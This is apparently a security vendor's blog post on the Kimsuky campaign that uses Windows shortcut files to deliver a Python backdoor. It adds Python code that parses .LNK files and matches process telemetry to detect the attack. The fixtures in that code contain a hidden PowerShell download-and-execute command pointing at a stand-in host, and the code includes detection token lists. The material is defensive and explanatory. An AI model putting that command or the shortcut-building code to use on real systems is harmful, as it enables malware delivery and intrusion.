When a Shortcut Isn’t Just a Shortcut: Inside the Kimsuky LNK Malware Campaign

A recent campaign by the Kimsuky threat group shows how simple shortcut (.LNK) files can be used to deliver multi-stage malware attacks. Learn how it works, why it’s effective, and what organisations should do to detect and prevent it.

At first glance, a Windows shortcut file (.LNK) looks harmless.

It’s something users interact with every day - opening applications, accessing files, or navigating systems.

But in a recent campaign attributed to the North Korean threat group Kimsuky, these seemingly benign files are being weaponised to deliver a sophisticated, multi-stage cyberattack.

What’s Happening?

Kimsuky is using malicious LNK files as an initial access vector to:

  • Execute hidden commands

  • Trigger multi-stage payload delivery

  • Install a Python-based backdoor on the victim system

The attack is designed to blend in with normal user behaviour, making detection significantly harder.

Why LNK Files?

LNK files are effective because:

  • Users trust them: a shortcut is an everyday object, not something anyone thinks of as "running a program"

  • A shortcut is only a pointer to a target plus arguments. If the target is cmd.exe or powershell.exe, the arguments can be an entire command line, and the file can ask Windows to start the window minimised and to display the icon of a document, so nothing visible happens when it is opened

  • Explorer never shows the .lnk extension, even when "hide extensions for known file types" is switched off, so a file named Report.pdf.lnk is displayed as Report.pdf

  • Mail filters and users are primed to distrust .exe, .js and macro-enabled Office attachments; a shortcut draws far less suspicion

To a user, it looks like:

“Just open this file.”

Behind the scenes, it’s something very different.

How the Attack Works (Simplified)
1. Initial Delivery

The victim receives a malicious LNK file via:

  • An email attachment

  • A download from a link in the lure

  • Other phishing or targeted delivery

2. Execution

When opened, the LNK file:

  • Causes Windows to launch the shortcut's target, typically a built-in command interpreter or script host, with the arguments stored in the file

  • Uses that command to fetch and start the next stage

The window can be requested minimised, so the user sees no obvious warning signs.

3. Multi-Stage Payload

The attack unfolds across several steps:

  • Additional scripts are downloaded from attacker-controlled infrastructure

  • Obfuscation (encoding, layered scripts) hides what each stage does

  • Because each stage only fetches the next, no single file contains the whole attack, and scanning the attachment alone reveals little

4. Python-Based Backdoor Installed

The final payload:

  • Establishes persistent access

  • Enables remote command execution

  • Allows data exfiltration

Why This Matters

This attack highlights a key shift:

Attackers are increasingly using “normal” file types to bypass both users and security controls.

It’s not always about exploiting vulnerabilities.

Sometimes, it’s about exploiting trust and familiarity.

The Real Risk to Organisations

If successful, this type of attack can lead to:

  • Persistent access to systems

  • Data theft

  • Credential compromise

  • Lateral movement within the environment

And because it unfolds in stages, it can evade detection long enough to cause real damage.

What Organisations Should Be Doing
1. Don’t Trust File Types by Default

A shortcut is executable content in everything but name. Treat .lnk attachments the way you already treat scripts: block or quarantine them at the mail gateway, including inside archives, and do not rely on users being able to see the extension.

2. Strengthen Email & Endpoint Controls

Ensure:

  • Attachments are analysed, not just signature-scanned: shortcuts should be parsed for their target and arguments or detonated in a sandbox

  • Suspicious behaviour on the endpoint is monitored, in particular explorer.exe launching a command interpreter or script host

  • Script and command execution is controlled: application control (AppLocker or WDAC) for script hosts where users do not need them, PowerShell Constrained Language Mode and Script Block Logging where they do
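What "parse the shortcut for its target and arguments" looks like in practice, as an added example that is not code from the article or from any vendor tool: a small reader for the MS-SHLLINK format that pulls out the fields the attack chain above depends on (the target path, the command-line arguments, the ShowCommand value and the icon location) and scores them. The two .lnk blobs it scans are constructed in memory for the demonstration; the PowerShell command line, the example.invalid URL and the paths are hypothetical, not indicators from the campaign.

```python
"""Static triage of Windows shortcut (.LNK) files: an added example, not the article's code.

Parses the MS-SHLLINK ShellLinkHeader, the LocalBasePath inside LinkInfo and the StringData items,
then flags the traits that separate a weaponised shortcut from a normal one. The two .lnk blobs at
the bottom are constructed in memory for the demo; they are not campaign samples.
"""
import struct
from dataclasses import dataclass

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08  # LinkFlags bits
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand: start minimised and unfocused, so a console never takes the screen
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
ARG_TOKENS = ("-enc", "-w hidden", "-windowstyle hidden", "iex", "downloadstring", "frombase64string", "http")


@dataclass
class LnkInfo:
    show_command: int = 1
    local_base_path: str = ""  # LinkInfo.LocalBasePath (absolute target path)
    relative_path: str = ""    # StringData.RELATIVE_PATH
    arguments: str = ""        # StringData.COMMAND_LINE_ARGUMENTS
    icon_location: str = ""    # StringData.ICON_LOCATION


def _read_string(buf: bytes, off: int, unicode: bool):
    # One StringData item: 16-bit character count, then the characters (UTF-16LE when IsUnicode is set)
    (count,) = struct.unpack_from("<H", buf, off)
    width = 2 if unicode else 1
    raw = buf[off + 2:off + 2 + count * width]
    return raw.decode("utf-16-le" if unicode else "cp1252", "replace"), off + 2 + count * width


def parse_lnk(data: bytes) -> LnkInfo:
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    (flags,) = struct.unpack_from("<I", data, 0x14)
    (show_cmd,) = struct.unpack_from("<I", data, 0x3C)
    info, off = LnkInfo(show_command=show_cmd), 0x4C
    if flags & HAS_ID_LIST:  # skip the IDList; the target is also carried in LinkInfo
        (size,) = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:
        size, _hdr, li_flags, _vol_off, base_off = struct.unpack_from("<IIIII", data, off)
        if li_flags & 0x1:  # VolumeIDAndLocalBasePath: NUL-terminated ANSI path at LinkInfo + base_off
            end = data.index(b"\x00", off + base_off)
            info.local_base_path = data[off + base_off:end].decode("cp1252", "replace")
        off += size
    unicode = bool(flags & IS_UNICODE)
    for flag, attr in ((HAS_NAME, None), (HAS_REL_PATH, "relative_path"), (HAS_WORK_DIR, None),
                       (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location")):
        if flags & flag:  # StringData items appear in exactly this order
            value, off = _read_string(data, off, unicode)
            if attr:
                setattr(info, attr, value)
    return info


def assess(info: LnkInfo) -> list:
    """Reasons the shortcut looks weaponised; an empty list means nothing stood out."""
    findings = []
    target = (info.local_base_path or info.relative_path).replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args, icon = info.arguments.lower(), info.icon_location.lower()
    if target in SCRIPT_HOSTS:
        findings.append(f"target is a command/script host: {target}")
        if icon and not icon.endswith(target):
            findings.append(f"icon borrowed from another file to disguise the target: {icon}")
    if info.show_command == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE (console window kept out of the user's sight)")
    findings += [f"suspicious argument token: {tok!r}" for tok in ARG_TOKENS if tok in args]
    if len(args) > 250:
        findings.append(f"unusually long argument string ({len(args)} chars)")
    return findings


def scan(data: bytes) -> list:
    return assess(parse_lnk(data))


# ---- constructed fixtures (hypothetical, for the demo only) ----
def _link_info(local_base_path: str) -> bytes:
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"  # minimal VolumeID: DRIVE_FIXED, empty label
    base = local_base_path.encode("ascii") + b"\x00"
    vol_off, base_off = 0x1C, 0x1C + len(volume_id)
    suffix_off = base_off + len(base)
    return (struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 0x1, vol_off, base_off, 0, suffix_off)
            + volume_id + base + b"\x00")


def build_lnk(relative_path=None, arguments=None, icon_location=None, local_base_path=None, show_command=1) -> bytes:
    flags, body, strings = IS_UNICODE, b"", b""
    if local_base_path:
        flags |= HAS_LINK_INFO
        body = _link_info(local_base_path)
    for flag, value in ((HAS_REL_PATH, relative_path), (HAS_ARGS, arguments), (HAS_ICON, icon_location)):
        if value is not None:
            flags |= flag
            strings += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    header = (struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<II", flags, 0x80)  # FILE_ATTRIBUTE_NORMAL
              + b"\x00" * 24 + struct.pack("<III", 0, 0, show_command) + b"\x00" * 12)
    return header + body + strings


BENIGN = build_lnk(relative_path="..\\Documents\\Q3 Report.docx")
WEAPONISED = build_lnk(
    local_base_path="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    relative_path="..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    arguments="-w hidden -nop -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/s2')\"",
    icon_location="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    show_command=SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("weaponised", WEAPONISED)):
        print(f"{name}: {scan(blob) or ['no findings']}")
```

Run it against a real attachment with `scan(open(path, "rb").read())`. The parser deliberately skips the LinkTargetIDList and reads the target from LinkInfo and the relative path; a shortcut that carries its target only in the IDList will show an empty target and should be treated as suspicious rather than clean, since a legitimate shortcut rarely needs to hide it.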

3. Improve User Awareness

Users should understand:

  • Not all files are what they appear

  • Unexpected attachments should be treated carefully

4. Monitor Behaviour, Not Just Signatures

Traditional detection may miss multi-stage attacks.

Focus on:

  • Unusual process execution, for example explorer.exe spawning powershell.exe, cmd.exe or mshta.exe with a hidden or minimised window

  • Script activity, including encoded or download-and-execute PowerShell command lines, and interpreters such as python.exe appearing in user-writable directories

  • Outbound connections made by script hosts and interpreters rather than by browsers or mail clients
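The behavioural rules above, run over a handful of Sysmon-style events, as an added example that is not code from the article or from any product: the events are constructed for the demonstration (hypothetical hosts, pids, paths and TEST-NET addresses, not telemetry from the campaign). The point it makes is that a single hit is weak evidence, while a chain of explorer.exe launching a hidden script host, that host starting a Python interpreter from a user-writable path, and either of them calling out is strong evidence, so the rules link hits per host into one incident.

```python
"""Behavioural detection over process and network telemetry: an added example, not the article's code.

The events below are constructed Sysmon-style records (process create, network connect), not logs
from the campaign. Three rules cover the stages the article describes (a shortcut launches a hidden
script host, the script host starts a Python interpreter from a user-writable path, either stage
calls out), and hits on one host are linked into a single incident so the chain is reported together.
"""
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
PY_HOSTS = {"python.exe", "pythonw.exe"}
HIDDEN_TOKENS = ("-w hidden", "-windowstyle hidden", "-enc", "iex", "downloadstring", "frombase64string")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\", "\\programdata\\")
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EXPLORER = "C:\\Windows\\explorer.exe"

EVENTS = [  # constructed, in chronological order; hosts, pids, paths and addresses are hypothetical
    {"ts": "09:14:03", "host": "WS-17", "type": "process_create", "pid": 5012, "ppid": 1788, "image": PS,
     "parent_image": EXPLORER, "cmdline": "powershell.exe -w hidden -nop -c \"iex (New-Object "
     "Net.WebClient).DownloadString('http://example.invalid/s2')\""},
    {"ts": "09:14:04", "host": "WS-17", "type": "network_connect", "pid": 5012, "dest": "203.0.113.10:443"},
    {"ts": "09:14:09", "host": "WS-17", "type": "process_create", "pid": 5340, "ppid": 5012,
     "image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\py\\pythonw.exe", "parent_image": PS,
     "cmdline": "pythonw.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\py\\svc.py"},
    {"ts": "09:14:10", "host": "WS-17", "type": "network_connect", "pid": 5340, "dest": "203.0.113.10:443"},
    # ordinary activity on a second host: Word opening a document, a developer's Python build, a console
    {"ts": "09:20:11", "host": "WS-22", "type": "process_create", "pid": 3300, "ppid": 1600,
     "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "parent_image": EXPLORER,
     "cmdline": "\"WINWORD.EXE\" /n \"C:\\Users\\asmith\\Documents\\Q3 Report.docx\""},
    {"ts": "09:21:40", "host": "WS-22", "type": "process_create", "pid": 3410, "ppid": 2900,
     "image": "C:\\Python312\\python.exe", "parent_image": "C:\\Program Files\\Microsoft VS Code\\Code.exe",
     "cmdline": "python.exe build.py"},
    {"ts": "09:21:41", "host": "WS-22", "type": "network_connect", "pid": 3410, "dest": "198.51.100.7:443"},
    {"ts": "09:25:02", "host": "WS-22", "type": "process_create", "pid": 3500, "ppid": 1600, "image": PS,
     "parent_image": EXPLORER, "cmdline": "powershell.exe"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(procs: dict, pid: int):
    """Yield the process with this pid and its recorded ancestors (stops at an unseen parent)."""
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        yield procs[pid]
        pid = procs[pid]["ppid"]


def detect(events: list) -> dict:
    """Return {host: [timestamped stage descriptions]} for hosts showing the LNK execution chain."""
    procs = {}  # host -> pid -> process_create event
    for e in events:
        if e["type"] == "process_create":
            procs.setdefault(e["host"], {})[e["pid"]] = e
    flagged, incidents = {}, {}  # flagged: (host, pid) -> stage note
    for e in events:
        host, key = e["host"], (e["host"], e["pid"])
        if e["type"] == "process_create":
            img, parent, cmd = basename(e["image"]), basename(e["parent_image"]), e["cmdline"].lower()
            # stage 1: the shell launches a script host straight into a hidden/encoded command line
            if parent == "explorer.exe" and img in SCRIPT_HOSTS and any(t in cmd for t in HIDDEN_TOKENS):
                flagged[key] = f"stage 1: {parent} launched {img} with a hidden/encoded command line"
            # stage 2: a Python interpreter in a user-writable path with a script host in its ancestry
            elif img in PY_HOSTS and any(p in e["image"].lower() for p in USER_WRITABLE) and any(
                    basename(a["image"]) in SCRIPT_HOSTS for a in ancestry(procs.get(host, {}), e["ppid"])):
                flagged[key] = f"stage 2: {img} started from a user-writable path under a script host"
            note = flagged.get(key)
        else:  # stage 3: an already-flagged process reaches out
            note = (f"stage 3: {basename(procs[host][e['pid']]['image'])} connected to {e['dest']}"
                    if key in flagged else None)
        if note:
            incidents.setdefault(host, []).append(f"{e['ts']} pid {e['pid']} {note}")
    return incidents


if __name__ == "__main__":
    for host, stages in detect(EVENTS).items():
        print(host)
        for s in stages:
            print("  ", s)
```

The benign host never appears in the output: Word opened from Explorer is not a script host, the developer's python.exe lives under C:\Python312 with an editor as parent, and an interactive PowerShell console carries none of the hidden-window or download tokens. Tune HIDDEN_TOKENS and USER_WRITABLE to your estate before relying on the rules; the stage 2 rule in particular will need an allow-list wherever users legitimately run Python from their profile.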

Final Thought

Kimsuky’s use of LNK files is a reminder of something simple but important:

Attackers don’t need new tricks, just new ways to use old ones.

And organisations that rely solely on traditional detection methods will increasingly find themselves one step behind.

If you’d like support reviewing your detection capabilities or strengthening your endpoint security posture, get in touch with CNI Security Solutions.